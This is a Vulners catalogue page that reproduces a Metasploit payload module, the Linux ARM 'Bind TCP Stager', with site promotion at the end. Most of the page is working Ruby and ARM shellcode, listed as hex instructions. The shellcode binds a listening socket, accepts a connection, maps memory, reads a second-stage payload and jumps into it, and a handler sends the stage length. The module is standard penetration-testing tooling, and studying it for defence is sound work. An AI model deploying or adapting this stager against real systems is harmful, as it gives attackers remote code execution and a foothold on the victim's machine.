Vulners
Lucene search
Linux dup2 Command Shell, Bind TCP Stager
🗓️ 17 May 2013 17:09:45Reported by nemo <[email protected]>Type 
metasploit🔗 www.rapid7.com👁 13 Views
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
###
#
# BindTcp
# -------
#
# Linux bind TCP stager.
#
###
module MetasploitModule
CachedSize = 232
include Msf::Payload::Linux::Armle::Prepends
include Msf::Payload::Stager
def initialize(info = {})
super(merge_info(info,
'Name' => 'Bind TCP Stager',
'Description' => 'Listen for a connection',
'Author' => 'nemo <nemo[at]felinemenace.org>',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Handler' => Msf::Handler::BindTcp,
'Stager' =>
{
'Offsets' =>
{
'LPORT' => [ 214, 'n' ],
},
'Payload' =>
[
0xe59f70d4, # ldr r7, [pc, #212]
0xe3a00002, # mov r0, #2
0xe3a01001, # mov r1, #1
0xe3a02006, # mov r2, #6
0xef000000, # svc 0x00000000
0xe1a0c000, # mov ip, r0
0xe2877001, # add r7, r7, #1
0xe28f10b0, # add r1, pc, #176
0xe3a02010, # mov r2, #16
0xef000000, # svc 0x00000000
0xe2877002, # add r7, r7, #2
0xe1a0000c, # mov r0, ip
0xef000000, # svc 0x00000000
0xe2877001, # add r7, r7, #1
0xe1a0000c, # mov r0, ip
0xe0411001, # sub r1, r1, r1
0xe1a02001, # mov r2, r1
0xef000000, # svc 0x00000000
0xe1a0c000, # mov ip, r0
0xe24dd004, # sub sp, sp, #4
0xe2877006, # add r7, r7, #6
0xe1a0100d, # mov r1, sp
0xe3a02004, # mov r2, #4
0xe3a03000, # mov r3, #0
0xef000000, # svc 0x00000000
0xe59d1000, # ldr r1, [sp]
0xe59f3070, # ldr r3, [pc, #112]
0xe0011003, # and r1, r1, r3
0xe3a02001, # mov r2, #1
0xe1a02602, # lsl r2, r2, #12
0xe0811002, # add r1, r1, r2
0xe3a070c0, # mov r7, #192
0xe3e00000, # mvn r0, #0
0xe3a02007, # mov r2, #7
0xe59f3054, # ldr r3, [pc, #84]
0xe1a04000, # mov r4, r0
0xe3a05000, # mov r5, #0
0xef000000, # svc 0x00000000
0xe2877063, # add r7, r7, #99
0xe1a01000, # mov r1, r0
0xe1a0000c, # mov r0, ip
0xe3a03000, # mov r3, #0
0xe59d2000, # ldr r2, [sp]
0xe2422ffa, # sub r2, r2, #1000
0xe58d2000, # str r2, [sp]
0xe3520000, # cmp r2, #0
0xda000002, # ble 811c <last>
0xe3a02ffa, # mov r2, #1000
0xef000000, # svc 0x00000000
0xeafffff7, # b 80fc <loop>
0xe2822ffa, # add r2, r2, #1000
0xef000000, # svc 0x00000000
0xe1a0f001, # mov pc, r1
0x5c110002, # .word 0x5c110002
0x00000000, # .word 0x00000000
0x00000119, # .word 0x00000119
0xfffff000, # .word 0xfffff000
0x00001022 # .word 0x00001022
].pack("V*")
}
))
end
def handle_intermediate_stage(conn, payload)
print_status("Transmitting stage length value...(#{payload.length} bytes)")
address_format = 'v'
# Transmit our intermediate stager
conn.put( [ payload.length ].pack(address_format) )
return true
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jan 2025 14:31Current
7.3High risk
Vulners AI Score7.3